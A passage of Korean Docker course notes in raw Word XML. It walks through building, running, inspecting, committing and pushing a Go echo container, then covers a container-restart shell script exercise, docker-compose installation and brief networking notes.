    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005F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build -t echo .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Sending build context to Docker daemon  6.144kB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Step 1/4 : FROM golang:1.9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1.9: Pulling from library/golang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55cbf04beb70: Pull complete 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1607093a898c: Pull complete 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9a8ea045c926: Pull complete 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d4eee24d4dac: Pull complete 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9c35c9787a2f: Pull complete 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8b376bbb244f: Pull complete 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0d4eafcc732a: Pull complete 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186b06a99029: Pull complete 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Digest: sha256:8b5968585131604a92af02f5690713efadf029cc8dad53f79280b87a80eb1354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Status: Downloaded newer image for golang:1.9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---&gt; ef89ef5c42a9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Step 2/4 : RUN mkdir /echo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---&gt; Running in 58abad46c173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---&gt; b366997113c5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Removing intermediate container 58abad46c173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Step 3/4 : COPY main.go /echo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---&gt; a7707dc915ce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Removing intermediate container 9ce9c9e05285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 xml:space="preserve">Step 4/4 : CMD go run /echo/main.go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---&gt; Running in d321b29ef114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---&gt; bbdd71d4e499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Removing intermediate container d321b29ef114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Successfully built bbdd71d4e499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Successfully tagged echo:latest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Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3esbat2x30ec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호스트의 9090 포트를 컨테이너의 8080 포트로 맵핑해서 컨테이너를 실행</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000061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container run -p 9090:8080 -d echo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4daae1153e8f1959a6db7b6b94b4ba65f60d002c55d2514852060348b1949155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Style w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vnk1ihnjx66g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 상태를 확인 (실행 여부)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000619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container ps 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CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                    NAMES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4daae1153e8f        echo                "go run /echo/main.go"   13 seconds ago      Up 12 seconds       0.0.0.0:9090-&gt;8080/tcp   amazing_snyder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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ec5g8alvyjds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컨테이너에 서비스를 요청</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000061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curl http://localhost:9090</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000061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Hello Docker ^^ !!!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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wvrzvbur7dtn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컨테이너에 파일을 가져와서 수정 후 재실행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컨테이너의 /echo/main.go 파일을 호스트의 ./main2.go 파일로 복사</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000624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container cp 4da:/echo/main.go ./main2.go</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000625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ls main2.go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main2.go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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_th8azo7vg9la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호스트에서 ./main2.go 파일의 내용을 수정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000629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gedit main2.go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호스트의 ./main2.go 파일을 컨테이너의 /echo/main.go 파일로 복사</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000062B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container cp ./main2.go 4da:/echo/main.go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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2063kyhnifrt" w:id="43"/>
      <w:bookmarkEnd w:id="4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컨테이너가 재실행되지 않았으므로 변경된 내용이 반영되지 않았음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000062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curl http://localhost:9090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color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hello Docker ^^ !!!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@server:~/docker# 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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_crh5d6ys0wjg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컨테이너의 실행을 중지하고 재실행</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000632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container stop 4da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4da</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000634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docker container start 4da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4da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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_f2l47hxxfrna" w:id="45"/>
      <w:bookmarkEnd w:id="4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수정한 내용이 반영된 것을 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000638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root@server:~/docker# </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://localhost:9090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color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">안녕 도커 !!!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@server:~/docker# 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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e13850rsmapi" w:id="46"/>
      <w:bookmarkEnd w:id="4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컨테이너의 사용 현황을 조회</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000063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docker stats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CONTAINER           CPU %               MEM USAGE / LIMIT     MEM %               NET I/O             BLOCK I/O           PIDS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ef856229c5c9        0.00%               19.25MiB / 975.1MiB   1.97%               9.74kB / 4.1kB      10.6MB / 8.19kB     9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18a1c3237cfe        0.00%               9.207MiB / 975.1MiB   0.94%               4.61kB / 0B         0B / 8.19kB         10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68baf1297b3f        0.00%               9.188MiB / 975.1MiB   0.94%               4.82kB / 0B         0B / 8.19kB         10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root@server:~/docker/echo# docker container ls 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CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                    NAMES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ef856229c5c9        echo                "go run /echo/main.go"   15 minutes ago      Up 14 minutes       0.0.0.0:9090-&gt;8080/tcp   elastic_murdock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18a1c3237cfe        echo                "go run /echo/main.go"   16 minutes ago      Up 16 minutes                                unruffled_spence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68baf1297b3f        echo                "go run /echo/main.go"   22 minutes ago      Up 22 minutes                                admiring_feynman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Style w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_w0lxy5na6eul" w:id="47"/>
      <w:bookmarkEnd w:id="4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커테이너의 현재 상태 그대로 이미지를 생성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000064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docker commit ef85 myanjini/k_echo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sha256:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">e8d7627b322a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a01258dd3f76ca91764a457da52872248902dbf103f0e1c50d55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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p9fk53wknf6e" w:id="48"/>
      <w:bookmarkEnd w:id="4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생성된 이미지를 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000650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docker image ls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REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE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color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">myanjini/k_echo     latest              e8d7627b322a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">       15 seconds ago      758MB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echo                latest              bbdd71d4e499        About an hour ago   750MB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golang              1.9                 ef89ef5c42a9        10 months ago       750MB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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bvqj9v4qgobo" w:id="49"/>
      <w:bookmarkEnd w:id="4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도커 허브에 새롭게 생성한 이미지를 push</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000657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docker login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Login with your Docker ID to push and pull images from Docker Hub. If you don't have a Docker ID, head over to https://hub.docker.com to create one.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Username (myanjini): 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Password: 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Login Succeeded</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000065C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docker push myanjini/k_echo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The push refers to a repository [docker.io/myanjini/k_echo]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6ebb376134e0: Pushed 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3e90fac3c963: Pushed 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c0edeefeb992: Pushed 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186d94bd2c62: Mounted from myanjini/echo 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24a9d20e5bee: Mounted from myanjini/echo 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e7dc337030ba: Mounted from myanjini/echo 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920961b94eb3: Mounted from myanjini/echo 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fa0c3f992cbd: Mounted from myanjini/echo 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ce6466f43b11: Mounted from myanjini/echo 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719d45669b35: Mounted from myanjini/echo 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3b10514a95be: Mounted from myanjini/echo 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latest: digest: sha256:3141d0ad68401de0dffd336089f6d0ff738e26548079871b1f5f0777d60913e4 size: 2628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root@server:~/docker/echo# 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문제</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000067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runc.sh 스크립트를 작성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000067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파라미터로 컨테이너 이름을 받습니다. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000067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동일한 이름의 컨테이너가 존재하면 해당 컨테이너를 삭제 후 컨테이너를 생성(실행)한다. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000067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생성 스크립트는 다음과 같다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000674">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">docker container run --name 컨테이너이름 -itd -p 8888:8080 echo  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000067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runc.sh hello 명령을 입력하면 hello라는 이름의 컨테이너가 실행된다.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# 명령어 형식을 체크 (파라미터 존재 여부를 확인)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# 동일 이름의 컨테이너를 조회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# 동일 이름의 컨테이너가 존재하는 경우 해당 컨테이너를 삭제하고 메시지를 출력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# 컨테이너를 실행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# 쉘 종료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test.sh</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table10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6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$# ⇐ 파라미터의 개수를 반환</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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$* ⇐ 파라미터를 반환</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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./test.sh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./test.sh aaa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691">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@server:~/docker/echo# </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./test.sh aaa bbb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aaa bbb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6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container rm -f $(docker container ls --filter="name=$1" -q)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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container run -itd -p 8888:8080 --name $1 echo</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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6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 msg () {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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printf "%s" $1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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for i in {1..5}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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printf "%s" "."</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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sleep 1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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done</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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명령어 형식을 체크 (파라미터 존재 여부를 확인)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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 </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="ff0000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">$# == 0</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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6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echo 명령어 사용법이 잘못되었습니다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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echo [사용법] ./run.sh container_name</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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exit 1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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6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컨테이너 실행 전 컨테이너 리스트를 출력</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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"----------------------------"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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"실행전 docker container ps -a "</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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"----------------------------"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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msg "실행전 컨테이너 목록을 조회합니다."</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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container ps -a</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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동일 이름의 컨테이너를 조회</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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cid=$(docker container ps --filter="name=</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="ff0000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">^/$1$</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">" -q)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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동일 이름의 컨테이너가 존재하는 경우 해당 컨테이너를 삭제하고 메시지를 출력</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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[ </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="ff0000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"$cid" != ""</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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6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docker container rm -f $cid</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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echo $1 이름의 컨테이너\($cid\)를 삭제했습니다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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6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컨테이너를 실행</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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container run --name $1 -itd -p 8888:8080 echo </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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컨테이너 실행후 컨테이너 리스트를 출력</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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"----------------------------"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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"실행후 docker container ps -a "</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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"----------------------------"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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msg "실행후 컨테이너 목록을 조회합니다."</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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container ps -a</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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쉘 종료</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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YAML : 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"YAML은 마크업 언어가 아니다 (YAML Ain't Markup Language)”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006D7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pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:cs="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dtwx51t4v6ej" w:id="50"/>
      <w:bookmarkEnd w:id="5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설치</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006DA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# curl -L "https://github.com/docker/compose/releases/download/1.24.0/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose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# chmod +x /usr/local/bin/docker-compose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# docker-compose --version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006D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docker-compose version 1.24.0, build 0aa59064 ⇐ 버전이 다른 경우 실습이 안 될 수 있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root@server:~/docker/echo# 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계층                                           주요정보      데이터 전송 단위          주요 프로토콜</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006E9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======================= =========  ================= ===========</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006EA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응용 = 프로세스</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">: 메시지                                               약 65000개</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006EB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전송</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">+ 포트번호     데이터그램/세그먼트    UDP, TCP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006EC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네트워크 = 인터넷</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">+ IP주소         패킷                               IP, ICMP, ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006ED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데이터링크 --+</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">+ MAC주소    프레임                            Ethernet, PPP, … </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006EE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물리 -----------+ = 네트워크 인터페이스/접근</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006EF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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial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/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7375650" cy="2806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TCP 헤더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/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6505575" cy="267652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IP 헤더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/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6505575" cy="46767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티얼드롭(tear drop) 공격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IP 헤더의 프래그먼트 오프셋을 조작하여 수신측에서 분할된 패킷을 재조립할 수 없도록 하는 공격 기법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pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:cs="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x8scs1mvfin" w:id="51"/>
      <w:bookmarkEnd w:id="5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참고자료</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000705">
      <w:pPr>
        <w:rPr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http://www.pyrasis.com/docker.html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https://docs.docker.com/engine/reference/commandline/cli/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https://www.slideshare.net/pyrasis/docker-fordummies-44424016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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId59">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="ff0000"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://myanjini.tistory.com/category/%EB%8F%84%EC%BB%A4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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_epv76u3zv7iq" w:id="52"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
